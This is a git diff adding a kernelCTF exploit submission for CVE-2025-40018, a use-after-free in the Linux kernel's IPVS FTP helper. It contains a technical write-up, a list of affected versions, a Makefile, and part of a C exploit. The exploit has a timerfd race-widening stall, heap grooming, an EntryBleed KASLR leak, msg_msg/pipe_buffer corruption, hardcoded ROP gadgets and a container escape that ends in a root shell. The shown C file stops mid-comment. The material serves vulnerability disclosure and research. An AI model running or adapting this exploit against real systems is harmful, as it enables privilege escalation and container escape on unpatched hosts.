diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md
new file mode 100644
index 000000000..d8293e5bd
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/exploit.md
@@ -0,0 +1,274 @@
+## 1. Overview
+
+The vulnerability exists in the IP Virtual Server (IPVS) FTP helper module (`ip_vs_ftp`) and involves a Use-After-Free (UAF) in the module exit path. It occurs when the FTP application structure is freed during network namespace cleanup while still being referenced by active connections, leading to a UAF during connection flushing.
+
+## 2. Root Cause Analysis
+
+### 2.1. Module Exit and Application Free
+
+When a network namespace is destroyed, the kernel iterates through the exit handlers of all registered per-netns subsystems. The `ip_vs_ftp` module registers its exit handler, `__ip_vs_ftp_exit()`, which is executed before the core IPVS cleanup handler.
+
+In `__ip_vs_ftp_exit()`, the `unregister_ip_vs_app()` function is called to remove the FTP application.
+
+```c
+static void __ip_vs_ftp_exit(struct net *net)
+{
+    struct netns_ipvs *ipvs = net_ipvs(net);
+    // [...]
+    unregister_ip_vs_app(ipvs, &ip_vs_ftp);
+}
+```
+
+Inside `unregister_ip_vs_app()`, the `struct ip_vs_app` object representing the application template (variable `a`) is freed immediately using `kfree(a)` [1].
+
+It is worth noting that the incarnations (`inc`) are also released via `ip_vs_app_inc_release()` [2], which uses `call_rcu`. Therefore, while `inc` remains memory-safe during the subsequent RCU-protected connection flush, it contains a pointer (`inc->app`) to the template `a` which has been freed immediately. This makes `inc->app` a dangling pointer, and `a` the victim object for exploitation.
+
+```c
+void unregister_ip_vs_app(struct netns_ipvs *ipvs, struct ip_vs_app *app)
+{
+    struct ip_vs_app *a, *anxt, *inc, *nxt;
+    mutex_lock(&__ip_vs_app_mutex);
+
+    list_for_each_entry_safe(a, anxt, &ipvs->app_list, a_list) {
+        // [...]
+        list_for_each_entry_safe(inc, nxt, &a->incs_list, a_list) {
+            ip_vs_app_inc_release(ipvs, inc); // [2]
+        }
+
+        list_del(&a->a_list);
+        kfree(a); // [1] The application template is freed immediately!
+        // [...]
+    }
+    mutex_unlock(&__ip_vs_app_mutex);
+}
+```
+
+### 2.2. Connection Cleanup and UAF
+
+Following the execution of `__ip_vs_ftp_exit()`, the core IPVS cleanup handler `__ip_vs_cleanup_batch()` runs. This function flushes all remaining connections in the namespace.
+
+```c
+static void __net_exit __ip_vs_cleanup_batch(struct list_head *net_list)
+{
+    // [...]
+    list_for_each_entry(net, net_list, exit_list) {
+        ipvs = net_ipvs(net);
+        ip_vs_conn_net_cleanup(ipvs); // [3] Flushes connections
+        // [...]
+    }
+}
+```
+
+The connection flush path eventually reaches `ip_vs_unbind_app()`, which attempts to decrement the reference count of the application associated with the connection.
+
+```c
+void ip_vs_unbind_app(struct ip_vs_conn *cp)
+{
+    struct ip_vs_app *inc = cp->app;
+    // [...]
+    ip_vs_app_inc_put(inc); // [4]
+    cp->app = NULL;
+}
+```
+
+`ip_vs_app_inc_put()` decrements the incarnation's use count and then calls `ip_vs_app_put()` on the parent application.
+
+```c
+void ip_vs_app_inc_put(struct ip_vs_app *inc)
+{
+    atomic_dec(&inc->usecnt);
+    ip_vs_app_put(inc->app); // [5] Accesses inc->app (which is 'a' from [1])
+}
+
+static inline void ip_vs_app_put(struct ip_vs_app *app)
+{
+    module_put(app->module); // [6] UAF: Dereferences app->module
+}
+```
+
+The vulnerability manifests at [6]. The pointer `app` refers to the object `a` that was freed at [1]. Dereferencing `app->module` constitutes a Use-After-Free.
+
+### 2.3. The Race Window
+
+The vulnerability is a deterministic Use-After-Free where the object is freed and used in the same kernel thread. To exploit it, we must artificially create a race condition to reclaim the memory between these two events.
+
+#### Normal Execution
+
+In a normal scenario:
+
+```
+CPU 0 (netns cleanup kthread)
+-----------------------------
+__ip_vs_ftp_exit()
+  kfree(app)                       // [Free]
+
+__ip_vs_cleanup_batch()
+  ip_vs_conn_net_cleanup()
+    ip_vs_unbind_app()
+      ip_vs_app_put(app)
+        module_put(app->module)    // [UAF] - Dereferencing freed memory
+```
+
+#### Exploitation (Winning the Race)
+
+The exploit uses a timer interrupt to stall CPU 0, allowing CPU 1 to reclaim the freed object:
+
+```
+CPU 0 (netns cleanup kthread)           CPU 1 (Spray Thread)
+-----------------------------           --------------------
+__ip_vs_ftp_exit()
+  kfree(app)                            // [Free]
+
+< TimerFD Interrupt Fires >
+< HardIRQ -> SoftIRQ >
+< Stall: Churning huge waitqueue >
+                                        Spray user_key_payload
+                                        // [Reclaim] 'app' slot allocated
+                                        // Fake object written
+
+< Cleanup Resumes >
+__ip_vs_cleanup_batch()
+  ip_vs_conn_net_cleanup()
+    ip_vs_unbind_app()
+      ip_vs_app_put(app)
+        module_put(app->module)         // [UAF] - Dec(controlled addr)
+```
+
+## 3. Exploitation
+
+### 3.1. Primitive
+
+The UAF primitive allows us to perform an **Arbitrary Address Decrement**.
+When `module_put(app->module)` is called on the reclaimed fake object:
+1.  We control `app->module`. Let's set it to `TARGET_ADDR - offsetof(struct module, refcnt)`.
+2.  `module_put` executes `atomic_dec(&module->refcnt)`.
+3.  This results in `atomic_dec(TARGET_ADDR)`.
+
+We use this primitive to corrupt the `next` pointer of a `msg_msg` object, creating overlapping chunks on the kernel heap.
+
+### 3.2. Triggering the Vulnerability
+
+The exploitation involves two main components:
+1.  **Cleaner Thread (CPU 0):** The kernel worker thread processing `cleanup_net`. This thread performs the Free and the Use.
+2.  **Sprayer Thread (CPU 1):** The attacker thread running on a separate CPU. This thread handles heap grooming and the reclamation spray.
+
+#### 3.2.1. Heap Grooming (CPU 1)
+
+We target the `kmalloc-256` cache where `struct ip_vs_app` resides.
+1.  **Spray `pg_vec`:** We spray `pg_vec` to fill slabs on CPU 1.
+2.  **Create Holes:** We close specific sockets to create free slots for the victim object.
+3.  **Allocate Victim:** We trigger `unshare(CLONE_NEWNET)` to allocate the `ip_vs_ftp` application into one of our prepared slots on CPU 1.
+4.  **Cross-CPU Slab Freeze:** We free an *additional* object in the victim's slab. This transitions the slab from "Full" to "Partial" on CPU 1.
+
+**Why Freeze?** When `kfree(app)` occurs on CPU 0, the object is returned to its owning slab. Since the slab is on CPU 1's partial list, CPU 1 can immediately reallocate from it. If we didn't do this before exiting netns, the object will be freed into a per-cpu cache on CPU 0 during `cleanup_net()`, making it impossible for CPU 1 to reclaim.
+
+```c
+static void freeze_victim_slab() {
+    // Free one object per slab to transition FULL -> PARTIAL on CPU 1
+    for (int i = 0; i < PACKET_SPRAY_CNT; i += KMALLOC_256_OBJS_PER_SLAB) {
+        close(packet_fds[i + SLOTS_PER_SLAB]);
+        packet_fds[i + SLOTS_PER_SLAB] = -1;
+    }
+}
+```
+
+#### 3.2.2. Binding the Vulnerable Object
+
+To trigger the UAF, we must create a dependency between a persistent `ip_vs_conn` and the victim object (`ip_vs_app`).
+
+The exploit sets up an IPVS service on port 21 (FTP) and establishes a TCP connection to it. When the connection is created in `ip_vs_conn_new()`, the kernel checks if the protocol has any registered applications. Since `ip_vs_ftp` is registered for port 21, the connection is automatically bound to the FTP application incarnation.
+
+```c
+// net/netfilter/ipvs/ip_vs_conn.c
+struct ip_vs_conn *
+ip_vs_conn_new(...)
+{
+    // ...
+    if (unlikely(pd && atomic_read(&pd->appcnt)))
+        ip_vs_bind_app(cp, pd->pp);
+    // ...
+}
+
+// net/netfilter/ipvs/ip_vs_proto_tcp.c
+static int
+tcp_app_conn_bind(struct ip_vs_conn *cp)
+{
+    // ...
+    list_for_each_entry_rcu(inc, &ipvs->tcp_apps[hash], p_list) {
+        if (inc->port == cp->vport) {
+            // ...
+            cp->app = inc; // [1] Connection bound to FTP incarnation
+            // ...
+        }
+    }
+    return result;
+}
+```
+
+This binding (`cp->app`) is critical. When the namespace is destroyed, `ip_vs_conn_flush()` cleans up this connection, accessing `cp->app->app`—the object that has just been freed by `ip_vs_ftp_exit`.
+
+#### 3.2.3. Extending the Race Window (Timerfd Storm)
+
+To reclaim the object between the Free and the Use on CPU 0, we employ a technique that transforms a tiny kernel race window into a large, hit-able target by racing against a hardware timer.
+
+1.  **Timerfd:** We create a `timerfd` and arm it to fire *exactly* when the cleanup thread is executing the critical section on CPU 0.
+2.  **Waitqueue Churn:** We attach thousands of `epoll` instances to this `timerfd`. When the timer expires, the hardware raises an interrupt on CPU 0. The interrupt handler wakes up all waiters on the `timerfd`. Because we have attached a massive number of `epoll` entries, the kernel is forced to churn through this list.
+3.  **The Stall:** This massive "thundering herd" effectively stalls the execution of the cleanup thread on CPU 0 for milliseconds, turning a microsecond-scale race into a stable, millisecond-scale window.
+
+```c
+    tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+    do_epoll_enqueue(tfd, 17); // Enqueue thousands of epoll items
+
+    // ... inside the race loop ...
+    // Arm timer to fire just as cleanup_net starts
+    timerfd_settime(tfd, TFD_TIMER_CANCEL_ON_SET, &new, NULL);
+```
+
+#### 3.2.4. Reclaiming with `user_key_payload`
+
+While CPU 0 is stalled, CPU 1 continuously sprays `user_key_payload` objects using `add_key()`. These objects fit in `kmalloc-256` and allow us to write arbitrary data into the freed object.
+
+```c
+void *spray_job(void *arg) {
+    bind_to_cpu(1);
+    while (1) {
+        // ... synchronization ...
+        spray_userkey(); // Reclaim the freed slot
+        // ... synchronization ...
+        cleanup_userkey();
+    }
+}
+```
+
+We craft the payload to fake `struct ip_vs_app`, setting the `module` pointer to target our `msg_msg` object.
+
+```c
+static inline void set_dec_addr(uint64_t target) {
+    char *fake_ip_vs_app = user_key_payload;
+    // Point app->module to (Target Address - refcnt_offset)
+    *(uint64_t *)&fake_ip_vs_app[IP_VS_APP_OFFSETS_MODULE] = target - MODULE_OFFSETS_REFCNT;
+}
+```
+
+### 3.3. Bypass KASLR
+
+The vulnerability primitive does not provide a way to leak kernel addresses and is only exploitable when a valid kernel text address is known, as setting the `module` pointer requires it.
+
+To address this, we use EntryBleed, a time-based side-channel attack, to leak the kernel base address. More details can be found at https://www.willsroot.io/2022/12/entrybleed.html or other kernelCTF submissions.
+
+### 3.4. Privilege Escalation (Msg_msg Overlap)
+
+1.  **Heap Spray:** We spray ~1.37 GB of `msg_msg` objects to land one at a predictable physical address (`GUESSED_MSG_ADDR`).
+2.  **Corrupt `next`:** The UAF primitive decrements the `next` pointer of a message header. This causes it to point to a previous message's segment, creating two overlapping `msg_msgseg` objects.
+3.  **UAF on `pipe_buffer`:**
+    *   We free the *first* overlapping segment (victim).
+    *   We spray `pipe_buffer` objects, which are allocated into the now-freed slot.
+    *   We free the *second* overlapping segment (target). Since they overlap, this frees the memory occupied by the `pipe_buffer`, creating a Use-After-Free condition on the `pipe_buffer` object.
+4.  **ROP Chain:**
+    *   We spray `msg_msgseg` objects again to reclaim the freed `pipe_buffer` slot with controlled data.
+    *   We overwrite the `pipe_buffer->ops` pointer with a fake vtable pointing to our gadgets.
+    *   Triggering `pipe_release()` (by closing the pipe) invokes the fake release function, pivoting the stack to execute the ROP chain.
+
+### 3.5. Container Escape
+
+The exploit runs inside a container. The ROP chain includes a call to `switch_task_namespaces(init_nsproxy)` to switch the process back to the host's initial namespace, effectively breaking out of the container before spawning a root shell.
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md
new file mode 100644
index 000000000..de53a62cb
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/docs/vulnerability.md
@@ -0,0 +1,36 @@
+# Vulnerability
+The vulnerability is a Use-After-Free (UAF) issue in the IPVS subsystem caused by incorrect cleanup ordering during network namespace destruction. The FTP application helper (`ip_vs_ftp`) frees its application structure (`struct ip_vs_app`) in its exit handler `__ip_vs_ftp_exit`, which runs before the core IPVS cleanup handler `__ip_vs_cleanup_batch`. When `__ip_vs_cleanup_batch` subsequently flushes active connections, it dereferences the now-freed application structure via `cp->app->app`, leading to a UAF.
+
+## Requirements to trigger the vulnerability
+- Capabilities: CAP_NET_ADMIN
+- Kernel configuration: CONFIG_NETFILTER, CONFIG_IP_VS, CONFIG_IP_VS_FTP
+- User namespaces needed: Yes
+
+## Commit which introduced the vulnerability
+- [61b1ab4583e275af216c8454b9256de680499b19](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=61b1ab4583e275af216c8454b9256de680499b19)
+
+## Commit which fixed the vulnerability
+- Fixed in 5.4.301 with commit [8a6ecab3847c213ce2855b0378e63ce839085de3](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8a6ecab3847c213ce2855b0378e63ce839085de3)
+- Fixed in 5.10.246 with commit [421b1ae1574dfdda68b835c15ac4921ec0030182](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=421b1ae1574dfdda68b835c15ac4921ec0030182)
+- Fixed in 5.15.195 with commit [1d79471414d7b9424d699afff2aa79fff322f52d](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=1d79471414d7b9424d699afff2aa79fff322f52d)
+- Fixed in 6.1.156 with commit [53717f8a4347b78eac6488072ad8e5adbaff38d9](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=53717f8a4347b78eac6488072ad8e5adbaff38d9)
+- Fixed in 6.6.112 with commit [8cbe2a21d85727b66d7c591fd5d83df0d8c4f757](https://web.git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=8cbe2a21d85727b66d7c591fd5d83df0d8c4f757)
+- Fixed in 6.12.53 with commit [dc1a481359a72ee7e548f1f5da671282a7c13b8f](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=dc1a481359a72ee7e548f1f5da671282a7c13b8f)
+- Fixed in 6.17.3 with commit [a343811ef138a265407167294275201621e9ebb2](https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=a343811ef138a265407167294275201621e9ebb2)
+- Fixed in 6.18-rc1 with commit [134121bfd99a06d44ef5ba15a9beb075297c0821](https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=134121bfd99a06d44ef5ba15a9beb075297c0821)
+
+## Affected kernel versions
+- 5.4.0 - 5.4.300
+- 5.10.0 - 5.10.245
+- 5.15.0 - 5.15.194
+- 6.1.0 - 6.1.155
+- 6.6.0 - 6.6.111
+- 6.12.0 - 6.12.52
+- 6.17.0 - 6.17.2
+
+## Affected component, subsystem
+- Netfilter
+- IPVS
+
+## Cause
+- Use-After-Free
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile
new file mode 100644
index 000000000..7cb8a8850
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/Makefile
@@ -0,0 +1,2 @@
+exploit: exploit.c
+	gcc $^ -pthread -static -o $@
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit
new file mode 100755
index 000000000..dcbf4b625
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c
new file mode 100644
index 000000000..f3f61b356
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2025-40018_cos/exploit/cos-113-18244.448.33/exploit.c
@@ -0,0 +1,913 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <assert.h>
+#include <errno.h>
+#include <signal.h>
+
+#include <fcntl.h>
+#include <pthread.h>
+#include <semaphore.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/msg.h>
+#include <sys/resource.h>
+#include <sys/timerfd.h>
+#include <sys/epoll.h>
+#include <unistd.h>
+#include <syscall.h>
+
+#include <arpa/inet.h>
+#include <net/if.h>
+
+#include <linux/if_tun.h>
+#include <linux/if_packet.h>
+#include <linux/ip_vs.h>
+#include <linux/keyctl.h>
+
+#define PAGE_SIZE 0x1000
+
+// =-=-=-=-=-=-=-= LOG HELPERS =-=-=-=-=-=-=-=
+#define COLOR_GREEN "\033[32m"
+#define COLOR_RED "\033[31m"
+#define COLOR_BLUE "\033[34m"
+#define COLOR_DEFAULT "\033[0m"
+#define COLOR_BOLD "\033[1m"
+#define COLOR_BRIGHT_BLUE "\033[94m"
+
+#define logd(fmt, ...) dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
+#define logi(fmt, ...) dprintf(2, COLOR_BLUE COLOR_BOLD"[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
+#define logs(fmt, ...) dprintf(2, COLOR_GREEN COLOR_BOLD"[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
+#define loge(fmt, ...) dprintf(2, COLOR_RED COLOR_BOLD"[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__, __LINE__, ##__VA_ARGS__)
+#define die(fmt, ...) \
+    do { \
+        loge(fmt ": %m", ##__VA_ARGS__);   \
+        loge("Exit at line %d", __LINE__); \
+        exit(1); \
+    } while (0)
+#define SYSCHK(x)                     \
+	({                                \
+		typeof(x) __res = (x);        \
+		if (__res == (typeof(x))-1) { \
+			die("SYSCHK(" #x ")"); \
+		}							  \
+		__res;                        \
+	})
+
+// =-=-=-=-=-=-=-= ROP HELPERS =-=-=-=-=-=-=-=
+// 0xffffffff8114067e : pop rsp ; pop r15 ; ret
+#define POP_RSP_POP_R15_RET 0xffffffff8114067e
+// 0xffffffff81a0f50b : push rsi ; jmp qword ptr [rsi + 0x39]
+#define PUSH_RSI_JMP_QWORD_PTR_RSI_0X39 0xffffffff81a0f50b
+// 0xffffffff8138288b : pop rdi ; or dh, dh ; ret
+#define POP_RDI_RET 0xffffffff8138288b
+// 0xffffffff81126164 : pop r12 ; pop rbp ; pop rbx ; ret
+#define POP_R12_POP_RBP_POP_RBX_RET 0xffffffff81126164
+// 0xffffffff81f1beb1 : pop rsi ; or dh, dh ; ret
+#define POP_RSI_RET 0xffffffff81f1beb1
+// 0xffffffff819ecfd2 : push rax ; jmp qword ptr [rsi - 0x7f]
+#define PUSH_RAX_JMP_QWORD_PTR_RSI_MINUS_0x7f 0xffffffff819ecfd2
+
+#define INIT_CRED 0xffffffff83a75f00
+#define INIT_NSPROXY 0xffffffff83a75cc0
+#define COMMIT_CREDS 0xffffffff811d55b0
+#define SWITCH_TASK_NAMESPACES 0xffffffff811d3a30
+#define FIND_TASK_BY_VPID 0xffffffff811cbf20
+#define INIT_TASK 0xffffffff83a15a40
+#define PREPARE_KERNEL_CRED 0xffffffff811d5850
+#define RET2USERMODE 0xffffffff824011c6
+
+uint64_t cs, rsp, ss, rflags;
+
+static void save_status() {
+	asm(
+	"movq %%cs, %0\n"
+	"movq %%ss, %1\n"
+	"pushfq\n"
+	"popq %2\n"
+  	"movq %%rsp, %3\n"
+	: "=r" (cs), "=r" (ss), "=r" (rflags), "=r" (rsp) : : "memory" );
+}
+
+void win(void){
+    logs("exploit success!!");
+	// escape pid/mount/network/ipc namespace
+	setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
+	setns(open("/proc/1/ns/pid", O_RDONLY), 0);
+	setns(open("/proc/1/ns/net", O_RDONLY), 0);
+    char* shell[] = {
+        "/bin/sh",
+        "-c",
+        "/bin/cat /flag && echo ; echo o>/proc/sysrq-trigger",
+        NULL,
+    };
+    execve(shell[0], shell, NULL);
+	exit(0);
+}
+
+// =-=-=-=-=-=-=-= UTILS =-=-=-=-=-=-=-=
+void write_file(const char * filename, const char * buf) {
+    int fd = open(filename, O_WRONLY | O_CLOEXEC);
+    if (fd < 0) die("open");
+    if (write(fd, buf, strlen(buf)) != strlen(buf)) die("write");
+    close(fd);
+}
+
+static void setup_namespace(void) {
+    char uid_map[128];
+    char gid_map[128];
+    uid_t uid = getuid();
+    gid_t gid = getgid();
+    if (unshare(CLONE_NEWUSER | CLONE_NEWNS | CLONE_NEWNET | CLONE_NEWIPC))
+        die("unshare");
+    sprintf(uid_map, "0 %d 1\n", uid); 
+    sprintf(gid_map, "0 %d 1\n", gid);
+    write_file("/proc/self/uid_map", uid_map);
+    write_file("/proc/self/setgroups", "deny");
+	write_file("/proc/self/gid_map", gid_map);
+}
+
+static void bring_interface_up(const char *ifname)
+{
+    int sockfd;
+    struct ifreq ifr;
+    sockfd = socket(AF_INET, SOCK_DGRAM, 0);
+    if (sockfd < 0)
+        die("socket");
+    memset(&ifr, 0, sizeof ifr);
+    strncpy(ifr.ifr_name, ifname, IFNAMSIZ);
+    ifr.ifr_flags |= IFF_UP;
+    ioctl(sockfd, SIOCSIFFLAGS, &ifr);
+    close(sockfd);
+}
+
+static void bind_to_cpu(int core){
+    cpu_set_t cpu_set;
+    CPU_ZERO(&cpu_set);
+    CPU_SET(core, &cpu_set);
+    if (sched_setaffinity(0, sizeof(cpu_set_t), &cpu_set) == -1)
+        die("sched_setaffinity");
+}
+
+// ========-=-=-=-=-= TIMERFD RACE HELPERS =-=-=-=-=-=-=-=
+int count;
+char buf[0x1000];
+int timefds[0x1000];
+int epfds[0x1000];
+int tfd;
+pid_t childs[0x10];
+pthread_barrier_t barr;
+int ncpus;
+
+static void barrier(pthread_barrier_t *barr)
+{
+	int ret = pthread_barrier_wait(barr);
+	assert(!ret || ret == PTHREAD_BARRIER_SERIAL_THREAD);
+}
+
+static void epoll_ctl_add(int epfd, int fd, uint32_t events)
+{
+	struct epoll_event ev;
+	ev.events = events;
+	ev.data.fd = fd;
+	SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &ev));
+}
+
+static void do_epoll_enqueue(int fd, int f)
+{
+	int cfd[2];
+	socketpair(AF_UNIX, SOCK_STREAM, 0, cfd);
+	for (int k = 0; k < f; k++)
+	{
+		childs[k] = fork();
+		if (childs[k] == 0)
+		{
+			for (int i = 0; i < 0xd0; i++)
+			{
+				timefds[i] = SYSCHK(dup(fd));
+			}
+			for (int i = 0; i < 0xd0; i++)
+			{
+				epfds[i] = SYSCHK(epoll_create(0x1));
+			}
+			for (int i = 0; i < 0xd0; i++)
+			{
+				for (int j = 0; j < 0xd0; j++)
+				{
+					epoll_ctl_add(epfds[i], timefds[j], 0);
+				}
+			}
+			write(cfd[1], buf, 1);
+			raise(SIGSTOP);
+		}
+		read(cfd[0], buf, 1);
+	}
+}
+
+// =-=-=-=-=-=-=-= ENTRYBLEED HELPERS =-=-=-=-=-=-=-=
+// https://www.willsroot.io/2022/12/entrybleed.html
+#define KERNEL_BASE 0xffffffff81000000
+#define KERNEL_LOWER_BOUND 0xffffffff80000000ull
+#define KERNEL_UPPER_BOUND 0xffffffffc0000000ull
+
+#define STEP_KERNEL 0x100000ull
+#define SCAN_START_KERNEL KERNEL_LOWER_BOUND
+#define SCAN_END_KERNEL KERNEL_UPPER_BOUND
+#define ARR_SIZE_KERNEL (SCAN_END_KERNEL - SCAN_START_KERNEL) / STEP_KERNEL
+
+#define PHYS_LOWER_BOUND 0xffff888000000000ull
+#define PHYS_UPPER_BOUND 0xfffffe0000000000ull
+
+#define STEP_PHYS 0x40000000ull
+#define SCAN_START_PHYS PHYS_LOWER_BOUND
+#define SCAN_END_PHYS PHYS_UPPER_BOUND
+#define ARR_SIZE_PHYS (SCAN_END_PHYS - SCAN_START_PHYS) / STEP_PHYS
+
+#define DUMMY_ITERATIONS 5
+#define ITERATIONS 100
+#define LEAK_TIMES 5
+
+// Based on experiment, the kernel heap address leaked from sidechannel is KERNEL_PHYS_MAP + LEAKED_OFFSET
+#define LEAKED_OFFSET 0x100000000
+
+uint64_t leak_kernel_base, leak_kheap_base, kernel_offset = 0;
+
+uint64_t sidechannel(uint64_t addr) {
+    uint64_t a, b, c, d;
+    asm volatile (
+        ".intel_syntax noprefix;"
+        "mfence;"
+        "rdtscp;"
+        "mov %0, rax;"
+        "mov %1, rdx;"
+        "xor rax, rax;"
+        "lfence;"
+        "prefetchnta qword ptr [%4];"
+        "prefetcht2 qword ptr [%4];"
+        "xor rax, rax;"
+        "lfence;"
+        "rdtscp;"
+        "mov %2, rax;"
+        "mov %3, rdx;"
+        "mfence;"
+        ".att_syntax;"
+         : "=r" (a), "=r" (b), "=r" (c), "=r" (d)
+         : "r" (addr)
+         : "rax", "rbx", "rcx", "rdx"
+    );
+    a = (b << 32) | a;
+    c = (d << 32) | c;
+    return c - a;
+}
+
+uint64_t prefetch(int phys) {
+	uint64_t arr_size = ARR_SIZE_KERNEL;
+	uint64_t scan_start = SCAN_START_KERNEL;
+	uint64_t step_size = STEP_KERNEL;
+	if (phys)
+	{
+		arr_size = ARR_SIZE_PHYS;
+		scan_start = SCAN_START_PHYS;
+		step_size = STEP_PHYS;
+	}
+
+	uint64_t *data = malloc(arr_size * sizeof(uint64_t));
+	memset(data, 0, arr_size * sizeof(uint64_t));
+    uint64_t addr = ~0;
+
+    for (int i = 0; i < ITERATIONS + DUMMY_ITERATIONS; i++) {
+        for (uint64_t idx = 0; idx < arr_size; idx++) {
+            uint64_t test = scan_start + idx * step_size;
+            syscall(104);
+            uint64_t time = sidechannel(test);
+            if (i >= DUMMY_ITERATIONS) {
+                data[idx] += time;
+            }
+        }
+    }
+    for (int i = 0; i < arr_size; i++) {
+        data[i] /= ITERATIONS;
+    }
+    double initial_avg = 0.0;
+    for (int i = 0; i < arr_size; i++) {
+        initial_avg += data[i];
+    }
+    initial_avg /= arr_size;
+    double background_avg = 0.0;
+    int count = 0;
+    for (int i = 0; i < arr_size; i++) {
+        if (data[i] <= initial_avg * 1.1) {
+            background_avg += data[i];
+            count++;
+        }
+    }
+    if (count > 0) {
+        background_avg /= count;
+    } else {
+        background_avg = initial_avg;
+    }
+    // Select the first address whose time is lower than threshold as target address
+    // threshold = 0.9 * average_time
+    double threshold = background_avg * 0.9;
+    for (int i = 0; i < arr_size; i++) {
+        if (data[i] < threshold) {
+            addr = scan_start + i * step_size;
+            break;
+        }
+    }
+    return addr;
+}
+
+size_t mostFrequent(size_t *arr, size_t n)
+{
+    size_t maxcount = 0;
+    size_t element_having_max_freq;
+    for (int i = 0; i < n; i++)
+    {
+        size_t Count = 0;
+        for (int j = 0; j < n; j++)
+        {
+            if (arr[i] == arr[j])
+            Count++;
+        }
+        if (Count > maxcount)
+        {
+            maxcount = Count;
+            element_having_max_freq = arr[i];
+        }
+    }
+    return element_having_max_freq;
+}
+
+void leak() {
+    size_t kbase[LEAK_TIMES] = {0};
+    size_t kheap_base[LEAK_TIMES] = {0};
+    for (int i = 0; i < LEAK_TIMES; i++)
+    { 
+        kbase[i] = prefetch(0);
+        logd("%dth iteration leak: 0x%lx", i, kbase[i]);
+    }
+    for (int i = 0; i < LEAK_TIMES; i++)
+    {
+        kheap_base[i] = prefetch(1) - LEAKED_OFFSET;
+        logd("%dth iteration leak: 0x%lx", i, kheap_base[i]);
+    }
+
+    leak_kernel_base = mostFrequent(kbase, LEAK_TIMES);
+    kernel_offset = leak_kernel_base - KERNEL_BASE;
+    leak_kheap_base = mostFrequent(kheap_base, LEAK_TIMES);
+
+    logs("Chosen KASLR base: %lx", leak_kernel_base);
+    logs("Chosen KHEAP base: %lx", leak_kheap_base);
+    logs("kernel offset: %lx", kernel_offset);
+}
+
+// =-=-=-=-=-=-=-= PG_VEC HELPERS =-=-=-=-=-=-=-=
+static void packet_socket_rx_ring_init(int s, unsigned int block_size,
+                                unsigned int frame_size, unsigned int block_nr,
+                                unsigned int sizeof_priv, unsigned int timeout) {
+    int v = TPACKET_V3;
+    if (setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v)) < 0)
+        die("setsockopt(PACKET_VERSION)");
+
+    struct tpacket_req3 req;
+    memset(&req, 0, sizeof(req));
+    req.tp_block_size = block_size;
+    req.tp_frame_size = frame_size;
+    req.tp_block_nr = block_nr;
+    req.tp_frame_nr = (block_size * block_nr) / frame_size;
+    req.tp_retire_blk_tov = timeout;
+    req.tp_sizeof_priv = sizeof_priv;
+
+    if (setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)) < 0)
+        die("setsockopt(PACKET_RX_RING)");
+}
+
+static int packet_socket_setup(unsigned int block_size, unsigned int frame_size,
+                        unsigned int block_nr, unsigned int sizeof_priv, int timeout) {
+    int s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
+    if (s < 0) die("socket(AF_PACKET)");
+
+    packet_socket_rx_ring_init(s, block_size, frame_size, block_nr,
+                               sizeof_priv, timeout);
+
+    struct sockaddr_ll sa;
+    memset(&sa, 0, sizeof(sa));
+    sa.sll_family = PF_PACKET;
+    sa.sll_protocol = htons(ETH_P_ALL);
+    sa.sll_ifindex = if_nametoindex("lo");
+
+    if (bind(s, (struct sockaddr *)&sa, sizeof(sa)) < 0) 
+        die("bind(AF_PACKET)");
+
+    return s;
+}
+
+// We use kmalloc-256 pg_vec as spray object
+#define KMALLOC256_SIZE 256
+#define KMALLOC256_PAGE_CNT ((KMALLOC256_SIZE) / sizeof(void *))
+static int alloc_kmalloc_256_pg_vec() {
+    return packet_socket_setup(PAGE_SIZE, 2048, KMALLOC256_PAGE_CNT, 0, 100);
+}
+/*
